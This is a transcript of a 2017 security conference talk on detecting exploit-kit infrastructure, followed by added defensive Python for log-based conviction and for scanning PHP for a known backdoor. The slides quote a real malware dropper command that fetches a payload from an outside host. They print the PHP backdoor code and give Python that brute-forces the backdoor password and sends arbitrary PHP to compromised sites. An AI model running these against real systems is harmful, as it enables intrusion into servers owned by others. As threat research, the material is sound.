
Exploit Kit Cornucopia - Blackhat USA 2017


Matt Foley and Brad Antoniewicz - Detecting the compromised websites, gates, and dedicated hosts that make up the infrastructure used by Exploit Kits involves a variety of creative techniques. In this session, we will detail four approaches to uncovering these systems while explaining the underlying architecture of Exploit Kit networks. We will disclose a vulnerability in the injected code placed on compromised websites and exploit that vulnerability to uncover deeper infrastructure. Finally, we'll introduce a novel approach to obtaining the malware sent via phishing campaigns which is often the same result of an Exploit Kit compromise.

Note: This presentation contained embedded GIFs that do not animate in this release.


  1. Exploit Kit Cornucopia - Brad Antoniewicz, Matt Foley (statements and opinions do not represent the views of, or have been endorsed by, our employer)
  2. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential. Speakers: Matt Foley, Intern @ Cisco Umbrella, CS Major @ NYU Tandon; Brad Antoniewicz, Researcher @ Cisco Umbrella, @brad_anton
  3. Agenda: Background; Crawling; Amplifying Convictions; Backdoored; Disposable Mailboxes
  4. (image-only slide)
  5. Pseudo-Darkleech Campaign Using Rig Exploit Kit
  6. Exploit Kit -> Script -> Ransomware, Trojan, etc.
  7. cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",…….x);j./**/run("cmd"+E+" /c "+x,0)}catch(_x){};q.Deletefile(K);>o32.tmp && start wscript //B //E:JScript o32.tmp "gexywoaxor" "http://free.fabuloussatchi.com/?qtuif=4979&q=[REDACTED]&ct=diamond&oq=[REDACTED]" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
  8. Landing Page Injection (diagram): Victim; Compromised Site; Malvertising (Ad Net. Subscriber -> Staged Site (Ad)); RIG Server. Step 1: victim gets the lander (proxy).
  9. Filtering (diagram): Victim; Compromised Site; Malvertising (Ad Net. Subscriber -> Staged Site (Ad)); RIG Server. Step 1: victim gets the 'proxy'; a TDS/crawler filter sits in front (TDS filters on browser, IP, region, time).
  10. (image-only slide)
  11. (image-only slide)
  12. Exploit Delivery (diagram): Victim. Step 1: Lander. Step 2: render iframe -> Virtual Dedicated Server (VDS), victim gets the exploit.
  13. (image-only slide)
  14. Exploit Regurgitation: CVE-2015-8651 (Flash); CVE-2015-0311 (Flash); CVE-2016-4117 (Flash); CVE-2016-0189 (IE); CVE-2015-2419 (IE)
  15. HoeflerText prompt screenshots: https://www.bleepstatic.com/swr-guides/h/hoeflertext/firefox/HoeflerText-font-missing-firefox.jpg ; http://www.malware-traffic-analysis.net/2017/02/22/2017-02-22-EITest-HoeflerText-Chrome-popup-image-04.jpg
  16. ektracker.com. Special thanks to @cyber_attacks, @nao_sec, @ektracker, @executemalware
  17. IP/ASN relationships
  18. Domains/Registrants
  19. Scraping
  20. Scraper V1 (diagram): Orchestration -> domains in queue -> Worker, Worker
  21. Scraper V1 Worker: requests source; queries the site twice, then diffs DOM against source; filters
  22. Popularity and Spike: Google.com vs. Lander
  23. Proxy V1: BLOCKED
  24. Scraper V2 (diagram): Candidate 1, Candidate 2, Candidate 3 -> Browser (requests), Browser (requests) -> Detector Module -> EK Decoder Module
  25. Decoder Module: lander source and suspected EK passed to the EK Decoder Module; the decoder parses the JS and identifies EK artifacts (Flash exploits, executables, etc.)
  26. Proxy V2: Squid proxy; rotating IPs; choice of region
  27. Sources for Scraping: ektracker.com; malware-traffic-analysis.net; zerophagemalware.com; broadanalysis.com; malwarebreakdown.com. Credit: @nao_sec (Where to get suspected exploit kit sites)
  28. Amplifying Convictions with Hitlist
  29. (image-only slide)
  30. Compromised Site: Unknown. Backend Logs. Gate: Known.
  31. Conviction: Amplified! Logs -> EK List -> Candidates -> Filter -> Convict. S3 -> Lambda: if host in eks: s3.put_object(...)
  32. Teamwork makes the dream work. Scraper: finds landers, confirms HitList detections. HitList: finds compromised sites.
  33. Gates to compromised sites (graph of detections)
  34. Backdoored
  35. Campaign Orchestration (diagram): Attacker -> Compromised Sites running the nav-menu.php backdoor (pseudo-darkleech): preg_replace('/12/e', $code, '12') -> eval()
  36. Backdoor Obfuscation and 'Security' (nav-menu.php backdoor):
      $_passssword = '0a02419ec68460d4a320c53b680441ff';
      if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
  37. '0a02419ec68460d4a320c53b680441ff'
  38. $url = decrypt_url('a3d3czksLDIx………NDkyMzI7MjA0OTEzMjA='); (nav-menu.php backdoor)
  39. /blog/?manchester&utm_source=82267:1021107:2013 - userid? flowid?
  40. /blog/?manchester&utm_source=82267:1021107:2013 - userid? flowid? Further samples: /blog/?manchester&utm_source=65857:1018137:2013 ; /blog/?manchester&utm_source=50426:1022174:2013 ; /blog/?manchester&utm_source=77620:1019894:2013 ; /blog/?manchester&utm_source=33398:1017062:2013
  41. Backdoor access:
      pw = hashlib.md5('1021107').hexdigest()
      data = {pw: 'preg_match', 'a': '//e', 'c': 'some_php_code'}
      requests.post(compromised_site, data=data)
  42. nginx / Apache: Reasonable, but still good for us. awwwyisssss
  43. Brute Forcing:
      data = {'a': '//e', 'c': 'some_php_code'}
      for i in range(1010000, 1030000):
          pw = hashlib.md5(str(i)).hexdigest()
          data[pw] = 'preg_match'
          requests.post(compromised_site, data=data)
  44. POST Data
  45. Bypassing Filtering (diagram): Compromised Site -> Staged Site (Ad) -> RIG Server. Request new gates, spoof UserAgent, Source IP, etc.
  46. Reliable EK Server Hosting
  47. Disposable Mailboxes
  48. Not good for research
  49. @brad_anton (image-only slide)
  50. MailRunner: Identifying ransomware and commodity malware. Bait Mailboxes; Dewey Classification Engine; Convict, then pass on email attributes; Block.
  51. Detections (one mailbox): 7.4k malicious emails; 15k unique domains. @brad_anton
  52. lacedmail.com
  53. Little Things
  54. (image-only slide)
  55. (image-only slide)
  56. Recap: Good for research; Bad guy mistakes :); Amplify convictions; Roll your own scraper/proxy
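The "Amplifying Convictions with Hitlist" slides describe filtering backend logs against a list of known exploit-kit gates and landers so that the unknown referring sites can be convicted as compromised. The following is an added example, not code from the talk: it applies that filter (the slide's `if host in eks`) to constructed proxy-style records, with placeholder host names that are not indicators from the presentation.

```python
import re
from collections import defaultdict

# Constructed sample of known EK gate/lander hosts (the slide's "EK List").
# Placeholder names, not indicators from the talk.
EK_HOSTS = {"gate.example-ek.test", "lander.example-ek.test"}

# Constructed proxy-style records: timestamp client host referrer. The referrer
# is the page the victim came from, i.e. the candidate compromised site.
SAMPLE_LOGS = """\
2017-07-26T10:00:01Z 10.0.0.5 www.example-news.test -
2017-07-26T10:00:02Z 10.0.0.5 gate.example-ek.test www.example-news.test
2017-07-26T10:00:03Z 10.0.0.5 lander.example-ek.test gate.example-ek.test
2017-07-26T10:05:00Z 10.0.0.9 blog.example-shop.test -
2017-07-26T10:05:01Z 10.0.0.9 gate.example-ek.test blog.example-shop.test
2017-07-26T11:00:00Z 10.0.0.7 www.example-news.test -
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_logs(text):
    """Yield (timestamp, client, host, referrer); a '-' referrer becomes None."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of failing the batch
        ts, client, host, ref = m.groups()
        yield ts, client, host, None if ref == "-" else ref


def amplify(records, ek_hosts):
    """The slide's Lambda filter ('if host in eks'): keep records whose host is
    a known EK gate/lander and convict the referrer as a compromised site.
    Returns {compromised_site: sorted list of EK hosts it redirected to}."""
    convictions = defaultdict(set)
    for _ts, _client, host, ref in records:
        if host not in ek_hosts:
            continue
        if ref is None or ref in ek_hosts:
            continue  # direct hit or EK-internal hop: no new site to convict
        convictions[ref].add(host)
    return {site: sorted(hosts) for site, hosts in convictions.items()}


def convict_sample():
    """Run the pipeline over the constructed records."""
    return amplify(parse_logs(SAMPLE_LOGS), EK_HOSTS)
```

The sites returned are exactly the "Compromised Site: Unknown" nodes on the slide; the scraper can then confirm each one by fetching it, as the "Teamwork" slide describes.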

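The "Backdoored" slides show the pseudo-darkleech nav-menu.php backdoor: a hard-coded md5-style password variable, a variable function call keyed by that password on POST data, a preg_replace with the /e modifier, and a decrypt_url() call on an encoded blob. The following is an added defender-side check, not code from the talk: it scans PHP source for those indicators and pulls out the password hash so an incident responder can tie the site to a campaign flow id. The sample PHP, its hash and its blob are constructed placeholders.

```python
import re

# Constructed PHP sample carrying the indicators shown on the slides. The hash
# and the encoded blob are placeholders, not values taken from a live site.
SAMPLE_BACKDOOR = r"""<?php
$_passssword = '00000000000000000000000000000000';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c'])
    @$p[$_passssword](@$p['a'], @$p['c'], '');
$url = decrypt_url('PLACEHOLDERBASE64BLOB=');
preg_replace('/12/e', $code, '12');
"""

# Constructed clean file for comparison.
SAMPLE_CLEAN = r"""<?php
function wp_nav_menu_setup() { add_theme_support('menus'); }
"""

# (name, regex) pairs describing the nav-menu.php backdoor from the slides.
# Any single hit deserves a look; all four together is the full pattern.
INDICATORS = [
    ("md5-style password variable",
     re.compile(r"\$_pass+word\s*=\s*'[0-9a-f]{32}'")),
    ("variable function call keyed by the password",
     re.compile(r"@\$p\[\$_pass+word\]\s*\(")),
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\(\s*['\"]/[^'\"]*/e['\"]")),
    ("decrypt_url() of an encoded blob",
     re.compile(r"decrypt_url\(\s*['\"][A-Za-z0-9+/=]+['\"]")),
]


def scan_php(source):
    """Return the names of backdoor indicators found in a PHP source string."""
    return [name for name, rx in INDICATORS if rx.search(source)]


def extract_password_hash(source):
    """Return the 32-hex hash the backdoor compares POST keys against, or None.
    The slides show it is md5 of the campaign flow id from utm_source, so it
    ties a compromised site to a campaign when reviewing an incident."""
    m = re.search(r"\$_pass+word\s*=\s*'([0-9a-f]{32})'", source)
    return m.group(1) if m else None
```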